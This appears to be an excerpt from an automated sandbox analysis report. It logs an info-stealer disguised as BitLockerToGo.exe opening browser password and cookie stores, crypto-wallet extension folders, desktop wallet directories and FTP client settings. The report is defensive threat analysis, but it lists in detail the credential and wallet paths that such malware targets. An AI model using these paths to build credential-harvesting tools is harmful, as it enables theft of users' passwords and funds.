Source: BitLockerToGo.exe, 00000002.00000003.1891269625.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: BitLockerToGo.exe, 00000002.00000003.1891269625.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxx Liberty
Source: BitLockerToGo.exe, 00000002.00000003.1891269625.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: BitLockerToGo.exe, 00000002.00000003.1891269625.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Exodus
Source: gFCeeWNTvZ.exe, 00000000.00000000.1676171529.00000000014B9000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: github.com/go-playground/validator/v10.isEthereumAddress
Source: BitLockerToGo.exe, 00000002.00000003.1891269625.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: BitLockerToGo.exe, 00000002.00000003.1891269625.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior
